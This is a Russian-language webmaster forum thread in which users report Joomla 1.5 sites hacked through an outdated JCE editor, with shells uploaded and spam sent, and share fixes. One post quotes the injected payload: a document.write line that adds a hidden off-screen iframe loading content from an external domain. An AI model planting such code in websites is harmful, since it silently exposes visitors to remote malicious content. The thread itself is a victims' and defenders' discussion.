Редактор JCE Joomla 1.5 - дыра, взломали сайт

12
D
На сайте с 28.06.2008
Offline
1108
24544

Через редактор JCE для Joomla 1.5 были взломаны три сайта и тоннами рассылался спам.

Вирусные файлы .php лежали в папке /images/stories

Как сказал кодер, изучив файлы - доступ был ко всему сайту, могли делать все что хотели.

Версия редактора была старая (где то годовалой давности). Так что или удалите его или обновите на новую версию.

Вот собственно и все что хотел сказать....

Sasha_SW
На сайте с 09.11.2012
Offline
48
#1

Это в оригинальном коде JCE, скачанном с авторского сайта? Или редактор был скачан хрен знает откуда? 😮

AL
На сайте с 09.02.2010
Offline
199
#2

Такая же фигня.

Через 2 сайта на джумле разослали кучу спама и в всех файлах на сервере прописали снизу

document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://bxprgiui.qhigh.com/geowgjwiehgwvbb.cfg?11"></iframe>');

Перестаю тут обновлять темы, тк они стали платные. Пишите в телегу @Alex_Lab Все также перехватываю дропы RU под заказ и регулярно обновляю файл с дропами в продаже: https://docs.google.com/document/d/1wprrYn9Zweo8XlKsVQVXbh3rScPWm5y1NTm8Oua6ZUM
A
На сайте с 04.12.2009
Offline
161
#3

Скорее всего вам подгрузили шелл через file manager, который есть в составе этого JCE. Такая же уязвимость есть и в старых версиях ckeditor.

Копайте в сторону углубленных настроек своего JCE редактора(внимательно читайте readme файл), в частности запрет на загрузку html, php файлов(и ряда других расширений) и запрет на выполнение этих файлов.

A
На сайте с 03.04.2010
Offline
179
#4

та с этим jce вечно проблемы, давно от него отказался в пользу JCK

AL
На сайте с 09.02.2010
Offline
199
#5

Только у меня по идее у этих 2-х сайтов стоял редактор - no editor (без редактора), а как раз у тех сайтов где стоял jce - все ок

Sergh545
На сайте с 24.02.2011
Offline
124
#6

И мои сайт по ходу ломанули через редактор. Какой редактор лучше использовать и с какого сайта качать?

Оплата зарубежных сервисов, виртуальные бурж карты, получение и отправка SWIFT переводов. ( https://capitalist.net/reg?from=4e4c64388f )
D
На сайте с 28.06.2008
Offline
1108
#7

Можно использовать этот, только новую версию, в ней дыры уже нет... Брать тут http://www.joomlacontenteditor.net/downloads/editor

sear4er
На сайте с 04.03.2010
Offline
750
#8

Тоже самое, даже хостер локнул сайты.

Профессиональный SEO аудит с гарантией результата (форум). ( /ru/forum/824674 ) EVOLUTION SEO - Оптимизация, продвижение сайтов, вывод из под фильтров (личный сайт). ( https://evoseo.ru ) Бесплатные SEO консультации. ( https://evoseo.ru/seo-consultaciya/ )
K5
На сайте с 21.07.2010
Offline
209
#9

Могу помочь очистить, обращайтесь...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
sear4er
На сайте с 04.03.2010
Offline
750
#10

Получается если отрубать jce, то сайт не сломают?

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий